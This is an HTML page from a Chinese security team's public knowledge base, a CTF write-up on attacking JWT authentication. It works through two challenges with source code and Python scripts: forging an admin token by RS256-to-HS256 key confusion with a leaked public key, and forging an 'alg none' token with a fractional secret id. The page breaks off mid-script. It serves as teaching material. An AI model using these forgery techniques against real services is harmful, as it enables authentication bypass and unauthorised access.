<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>JWT | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/29.6393a40b.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="ant-row"><div class="nav-button"><i aria-label="icon: bars" class="anticon anticon-bars"><svg viewBox="0 0 1024 1024" focusable="false" data-icon="bars" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M912 192H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM104 228a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg></i> <span></span></div> <div class="ant-col ant-col-xs-24 ant-col-sm-24 ant-col-md-6 ant-col-lg-5 ant-col-xl-5 ant-col-xxl-4"><a href="/" class="router-link-active home-link"><img src="/assets/logo.svg" alt="狼组安全团队公开知识库" class="logo"> <span class="site-name">狼组安全团队公开知识库</span></a> <div class="search-box mobile-search"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div></div> <div class="ant-col ant-col-xs-0 ant-col-sm-0 ant-col-md-18 ant-col-lg-19 ant-col-xl-19 ant-col-xxl-20"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><ul role="menu" id="nav" class="ant-menu ant-menu-horizontal ant-menu-root ant-menu-light"><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/" class="router-link-active">
          首页
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/guide/">
          使用指南
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/knowledge/" class="router-link-active">
          知识库
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/opensource/">
          开源项目
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="visibility:hidden;position:absolute;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li></ul> <a href="https://github.com/wgpsec" target="_blank" rel="noopener noreferrer" class="repo-link"><i aria-label="icon: github" class="anticon anticon-github"><svg viewBox="64 64 896 896" focusable="false" data-icon="github" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M511.6 76.3C264.3 76.2 64 276.4 64 523.5 64 718.9 189.3 885 363.8 946c23.5 5.9 19.9-10.8 19.9-22.2v-77.5c-135.7 15.9-141.2-73.9-150.3-88.9C215 726 171.5 718 184.5 703c30.9-15.9 62.4 4 98.9 57.9 26.4 39.1 77.9 32.5 104 26 5.7-23.5 17.9-44.5 34.7-60.8-140.6-25.2-199.2-111-199.2-213 0-49.5 16.3-95 48.3-131.7-20.4-60.5 1.9-112.3 4.9-120 58.1-5.2 118.5 41.6 123.2 45.3 33-8.9 70.7-13.6 112.9-13.6 42.4 0 80.2 4.9 113.5 13.9 11.3-8.6 67.3-48.8 121.3-43.9 2.9 7.7 24.7 58.3 5.5 118 32.4 36.8 48.9 82.7 48.9 132.3 0 102.2-59 188.1-200 212.9a127.5 127.5 0 0 1 38.1 91v112.5c.8 9 0 17.9 15 17.9 177.1-59.7 304.6-227 304.6-424.1 0-247.2-200.4-447.3-447.5-447.3z"></path></svg></i></a></nav></div></div> <!----></header> <aside class="sidebar"><div><div class="promo"><div id="promo_3"><div class="promo_title">赞助商</div> <button type="button" class="ant-btn ant-btn-primary ant-btn-background-ghost"><span>成为赞助商</span></button></div></div> <div role="separator" id="reset-margin" class="ant-divider ant-divider-horizontal ant-divider-dashed"></div></div> <ul class="sidebar-links"><li><a href="/knowledge/" aria-current="page" title="知识库广告位招租" class="sidebar-link">知识库广告位招租</a></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>CTF</span> <span class="arrow down"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/knowledge/ctf/" aria-current="page" title="分类简介" class="sidebar-link">分类简介</a></li><li><a href="/knowledge/ctf/ctf.html" title="什么是CTF？" class="sidebar-link">什么是CTF？</a></li><li><a href="/knowledge/ctf/xxe.html" title="XXE" class="sidebar-link">XXE</a></li><li><a href="/knowledge/ctf/ssrf-gopher.html" title="ssrf gopher协议" class="sidebar-link">ssrf gopher协议</a></li><li><a href="/knowledge/ctf/exec.html" title="命令执行" class="sidebar-link">命令执行</a></li><li><a href="/knowledge/ctf/PRF.html" title="伪随机数" class="sidebar-link">伪随机数</a></li><li><a href="/knowledge/ctf/php-serialize.html" title="PHP反序列化" class="sidebar-link">PHP反序列化</a></li><li><a href="/knowledge/ctf/uploadfile.html" title="文件上传" class="sidebar-link">文件上传</a></li><li><a href="/knowledge/ctf/deserialize-byte-escape.html" title="反序列化字节逃逸" class="sidebar-link">反序列化字节逃逸</a></li><li><a href="/knowledge/ctf/bypass-disable-function.html" title="bypass-disable-function" class="sidebar-link">bypass-disable-function</a></li><li><a href="/knowledge/ctf/JWT.html" aria-current="page" title="JWT" class="active sidebar-link">JWT</a></li><li><a href="/knowledge/ctf/js-prototype-chain-pollution.html" title="nodejs原型链污染" class="sidebar-link">nodejs原型链污染</a></li><li><a href="/knowledge/ctf/SSTI.html" title="SSTI" class="sidebar-link">SSTI</a></li><li><a href="/knowledge/ctf/CBC.html" title="CBC" class="sidebar-link">CBC</a></li><li><a href="/knowledge/ctf/Hash-Leng-Extension.html" title="哈希长度拓展攻击" class="sidebar-link">哈希长度拓展攻击</a></li><li><a href="/knowledge/ctf/RSA.html" title="RSA" class="sidebar-link">RSA</a></li><li><a href="/knowledge/ctf/Volatility.html" title="Volatility取证分析工具" class="sidebar-link">Volatility取证分析工具</a></li><li><a href="/knowledge/ctf/ret2text.html" title="ret2text" class="sidebar-link">ret2text</a></li><li><a href="/knowledge/ctf/ret2shellcode.html" title="ret2shellcode" class="sidebar-link">ret2shellcode</a></li><li><a href="/knowledge/ctf/ret2syscall.html" title="ret2syscall" class="sidebar-link">ret2syscall</a></li><li><a href="/knowledge/ctf/re2libc.html" title="ret2libc" class="sidebar-link">ret2libc</a></li><li><a href="/knowledge/ctf/ret2csu.html" title="ret2csu" class="sidebar-link">ret2csu</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>基础知识</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>工具手册</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>Web安全</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>攻防对抗</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h1 id="jwt">JWT <a href="#jwt" class="header-anchor">#</a></h1> <p>JWT 的通常加密方式有 RS 和 HS</p> <p>将加密后的内容复制到 https://jwt.io/ 即可看到解密后的结果和加密方式</p> <p>其中 RS 是需要需要公私钥的，HS 是对称加密</p> <h2 id="攻击方法">攻击方法 <a href="#攻击方法" class="header-anchor">#</a></h2> <p>HS 可以使用 https://github.com/brendan-rius/c-jwt-cracker 工具进行爆破</p> <p>RS 验证配置错误，公钥泄露</p> <p>加密方式设置为 none</p> <h2 id="例题">例题： <a href="#例题" class="header-anchor">#</a></h2> <h3 id="hsctf-broken-tokens">HSCTF [Broken Tokens] <a href="#hsctf-broken-tokens" class="header-anchor">#</a></h3> <p>源码：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>import jwt
import base64
import os
import hashlib
from flask import Flask, render_template, make_response, request, redirect
app = Flask(__name__)
FLAG = os.getenv(&quot;FLAG&quot;)
PASSWORD = os.getenv(&quot;PASSWORD&quot;)
with open(&quot;privatekey.pem&quot;, &quot;r&quot;) as f:
	PRIVATE_KEY = f.read()
with open(&quot;publickey.pem&quot;, &quot;r&quot;) as f:
	PUBLIC_KEY = f.read()

@app.route('/', methods=['GET', 'POST'])
def index():
	if request.method == &quot;POST&quot;:
		resp = make_response(redirect(&quot;/&quot;))
		if request.form[&quot;action&quot;] == &quot;Login&quot;:
			if request.form[&quot;username&quot;] == &quot;admin&quot; and request.form[&quot;password&quot;] == PASSWORD:
				auth = jwt.encode({&quot;auth&quot;: &quot;admin&quot;}, PRIVATE_KEY, algorithm=&quot;RS256&quot;)
			else:
				auth = jwt.encode({&quot;auth&quot;: &quot;guest&quot;}, PRIVATE_KEY, algorithm=&quot;RS256&quot;)
			resp.set_cookie(&quot;auth&quot;, auth)
		else:
			resp.delete_cookie(&quot;auth&quot;)
		
		return resp
	else:
		auth = request.cookies.get(&quot;auth&quot;)
		if auth is None:
			logged_in = False
			admin = False
		else:
			logged_in = True
			admin = jwt.decode(auth, PUBLIC_KEY)[&quot;auth&quot;] == &quot;admin&quot;
		resp = make_response(
			render_template(&quot;index.html&quot;, logged_in=logged_in, admin=admin, flag=FLAG)
		)
	return resp

@app.route(&quot;/publickey.pem&quot;)
def public_key():
	with open(&quot;./publickey.pem&quot;, &quot;r&quot;) as f:
		resp = make_response(f.read())
		resp.mimetype = 'text/plain'
		return resp

if __name__ == &quot;__main__&quot;:
	app.run()
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br><span class="line-number">31</span><br><span class="line-number">32</span><br><span class="line-number">33</span><br><span class="line-number">34</span><br><span class="line-number">35</span><br><span class="line-number">36</span><br><span class="line-number">37</span><br><span class="line-number">38</span><br><span class="line-number">39</span><br><span class="line-number">40</span><br><span class="line-number">41</span><br><span class="line-number">42</span><br><span class="line-number">43</span><br><span class="line-number">44</span><br><span class="line-number">45</span><br><span class="line-number">46</span><br><span class="line-number">47</span><br><span class="line-number">48</span><br><span class="line-number">49</span><br></div></div><p>大致就是登录时验证的是私钥，然后登录后验证的是公钥，然后公钥可以通过 /publickey.pem 获取</p> <p>先登录成 guest，这时 Token 是</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJhdXRoIjoiZ3Vlc3QifQ.e3UX6vGuTGHWouov4s5HuKn6B5zbe0ZjxwHCB_OQlX_TcntJuj89x0RDi8gQi88TMoXSFN-qnFUQxillB_nD5ErrVZKL8HI5Ah_iQBX1xfu097H2xT3LAhDEceq4HDEQY-iC4TVSxMGM0AS_ItsVLBIrxk8tapcANvCW_KnO3mEFwfQOD64YHtapSZJ-kKjdN19lgdI_g-2nNI83P6TlgLtZ8vo1BB1zt_8b4UECSiPb67YCsrCYIIsABq5UyxSwgUpZsM6oxW0k1c4NbaUTnUWURG2qWDVw56svRQETU3YjO59AMj67n9r9Y9NJ9FBlpHQ60Ck-mfL5JcmFE9sgVw
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>解密后信息部分是</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>{ &quot;auth&quot;: &quot;guest&quot; }
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>然后再加密下</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>#!/usr/bin/env python
import jwt
import base64

with open(&quot;publickey.pem&quot;, &quot;r&quot;) as f:
	PUBLIC_KEY = f.read()
print(jwt.encode({&quot;auth&quot;:&quot;admin&quot;}, key=PUBLIC_KEY, algorithm='HS256'))
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p>如果出错了就把报错地方注释掉 ( algorithms.py )</p> <p>改成</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>def prepare_key(self, key):
        key = force_bytes(key)
        return key
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>原因是不能用公钥加密</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>flag{1n53cur3_tok3n5_5474212}
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h3 id="hfctf-easylogin">HFCTF [EasyLogin] <a href="#hfctf-easylogin" class="header-anchor">#</a></h3> <p>在源码中可以发现 app.js，可以判断是 node.js</p> <p>在备注中发现</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>或许该用 koa-static 来处理静态文件
路径该怎么配置？不管了先填个根目录XD
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>静态文件，根目录，那是不是可以直接访问</p> <p>于是直接访问根目录下的 app.js，成功读取源码</p> <p>根据 /static/js/app.js 中</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>function getflag() {
    $.get('/api/flag').done(function(data) {
        const {flag} = data;
        $(&quot;#username&quot;).val(flag);
    }).fail(function(xhr, textStatus, errorThrown) {
        alert(xhr.responseJSON.message);
    });
}
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p>以及 /app.js 中</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>// add controllers:
app.use(controller());
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>还有 koa 框架的文件结构可知</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>app.js          入口文件
config          项目路由文件夹
models          对应的数据库表结构
DataBase        保存数据库封装的CRUD操作方法
controllers     项目控制器目录接受请求处理逻辑
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>访问 /controllers/api.js 可得到逻辑源码</p> <p>代码中关键功能有：</p> <p>获得 flag 的功能，SESSION[username] == admin 就能获得</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>'GET /api/flag': async (ctx, next) =&gt; {
    if(ctx.session.username !== 'admin'){
        throw new APIError('permission error', 'permission denied');
    }
    const flag = fs.readFileSync('/flag').toString();
    ctx.rest({
        flag
    });
    await next();
},
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><p>注册的功能，很明显这里不让注册用户名为 admin 的用户，同时会根据用户生成一个 JWT 口令</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>'POST /api/register': async (ctx, next) =&gt; {
    const {username, password} = ctx.request.body;
    if(!username || username === 'admin'){
        throw new APIError('register error', 'wrong username');
    }
    if(global.secrets.length &gt; 100000) {
        global.secrets = [];
    }
    const secret = crypto.randomBytes(18).toString('hex');
    const secretid = global.secrets.length;
    global.secrets.push(secret)
    const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});
    ctx.rest({
        token: token
    });
    await next();
},
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br></div></div><p>登录的功能</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>'POST /api/login': async (ctx, next) =&gt; {
    const {username, password} = ctx.request.body;
    if(!username || !password) {
        throw new APIError('login error', 'username or password is necessary');
    }
    const token = ctx.header.authorization || ctx.request.body.authorization || ctx.request.query.authorization;
    const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;
    console.log(sid)

    if(sid === undefined || sid === null || !(sid &lt; global.secrets.length &amp;&amp; sid &gt;= 0)) {
        throw new APIError('login error', 'no such secret id');
    }
    const secret = global.secrets[sid];
    const user = jwt.verify(token, secret, {algorithm: 'HS256'});
    const status = username === user.username &amp;&amp; password === user.password;
    if(status) {
        ctx.session.username = username;
    }
    ctx.rest({
        status
    });
    await next();
},
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br></div></div><p>这里识别用户身份的方法是，在注册时随机生成一个密钥，存入数组，并用它来加密 JWT 信息，JWT中储存着密钥的数组下标和用户名密码</p> <p>（ JWT主要的功能是确认来源，防止伪造数据 ）</p> <p>然后登录时解密第一部分，获得 JWT 中储存的信息，然后根据数组下标获得密钥，然后根据密钥解密数据，比对解密前后的用户名密码是否相同</p> <p>这里存在的一个漏洞点是，在 JWT 的 jsonwebtoken 库中，接收的参数是 algorithms 而这里写的是 algorithm，这里跳过了验证</p> <p>并且，当解密时没有密钥，同时加密方式为 none 的时候，会忽视后面的解密算法，按 none 方式解密</p> <p>所以我们这里要把 JWT 信息解密后的数组下标替换成小数即可将密钥置空，之后就可以修改数值了</p> <p>JWT 信息部分解密后为</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>{&quot;secretid&quot;:4,&quot;username&quot;:&quot;111222&quot;,&quot;password&quot;:&quot;111222&quot;}
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>所以这里修改为</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>{&quot;secretid&quot;:0.4,&quot;username&quot;:&quot;111222&quot;,&quot;password&quot;:&quot;111222&quot;}
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>之后通过脚本重新加密</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>import jwt

token = jwt.encode({&quot;secretid&quot;:0.4,&quot;username&quot;:&quot;admin&quot;,&quot;password&quot;:&quot;admin&quot;},algorithm=&quot;none&quot;,key=&quot;&quot;).decode('utf-8')
print(token)
